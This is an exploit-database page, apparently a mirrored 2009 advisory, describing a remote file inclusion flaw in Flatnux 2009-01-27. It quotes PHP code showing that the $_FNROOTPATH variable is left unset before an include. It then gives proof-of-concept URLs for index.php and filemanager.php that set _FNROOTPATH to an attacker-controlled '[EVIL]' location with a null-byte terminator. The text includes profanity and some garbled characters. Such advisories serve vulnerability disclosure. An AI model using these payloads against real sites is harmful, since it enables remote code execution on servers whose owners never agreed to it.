[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Flatnux 2009-01-27 Remote File Inclusion Vulnerability
# Published : 2009-02-03
# Author : Alfons Luja
# Previous Title : DreamPics Photo/Video Gallery Blind SQL Injection Exploit
# Next Title : Openfiler 2.3 (Auth Bypass) Remote Password Change Exploit


@ flatnux Flatnux-2009-01-27 RFI
  zale??no??ci P 
  + Alfons Luja 
  + 2009 
  + grts : All friends
  
  
  VULN : 
       +++ include/theme.php
         ... 
        <?php
          if (eregi("theme.php", $_SERVER['PHP_SELF']))
	     die();                         // 0 <-- I dont give a fuck 
	

             global $theme, $_FNROOTPATH,$lang;   //<-- 1 
             global $forumback, $forumborder;       
             $_FN['table_background']=&$forumback;
             $_FN['table_border']=&$forumborder;


             if ($forumback=="" && $forumborder==""){
	        $forumback="ffffff";
	        $forumborder="000000";
                }
                require_once ($_FNROOTPATH . "themes/$theme/theme.php");

             /*------- Funzioni ridefinibili da theme.php--------------*/
         //......
      +++ /flatnux.php line 116:
            
           //$_FNROOTPATH Still dont have value 
           include_once "./include/theme.php";   //-- 2
          
      +++ /filemanager.php 
          include "./include/flatnux.php"; // -- RFI

  p0c:
     http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00    
     http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
     ... itd ...

  --http://www.wrzuta.pl/audio/xLyg0zckZS/--
  #E??OF lol

# www.Syue.com [2009-02-03]